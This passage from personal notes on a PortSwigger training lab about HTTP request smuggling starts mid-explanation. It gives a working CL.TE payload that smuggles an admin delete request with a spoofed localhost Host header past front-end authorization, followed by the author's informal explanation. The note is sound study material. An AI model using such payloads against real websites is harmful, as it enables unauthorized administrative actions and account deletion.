badrouarafana/HackingNotes/PortSwigger/HTTP_REQUEST_SMUGGLING/notes.md

     0\r\n
     \r\n
 and the content length is set to 13 it's 7 the size of `\r\n0\r\n\r\n` + `GET \` normally i mad a mistake it should be 14 since i used POST =)

+## Lab solution

+After detecting it was CL.TE vulnerability, we want to delete the username carlos, and access admin page, since the authorization doesn't work on the Front, the payload i used is :

+    POST / HTTP/1.1
+    Host: 0a9000d40391160c82299d3800c200bb.web-security-academy.net
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 153
+    Transfer-Encoding: chunked

+    3
+    aaa
+    0

+    GET /admin/delete?username=carlos HTTP/1.1
+    Host: localhost
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 166

+    foo=bar

+and for the normal request :

+    POST / HTTP/1.1
+    Host: 0a9000d40391160c82299d3800c200bb.web-security-academy.net
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 7

+    foo=bar

+Explications :

+Since the backend uses TE, we want to poison with with `GET /admin`, so the backend will get 3 aaa and 0 and it will stop processing the request putting `GET/admin` on the queue, and we change `Host: localhost` to bypass the filters and the content body, just crap to make everything else into a body that is ignored.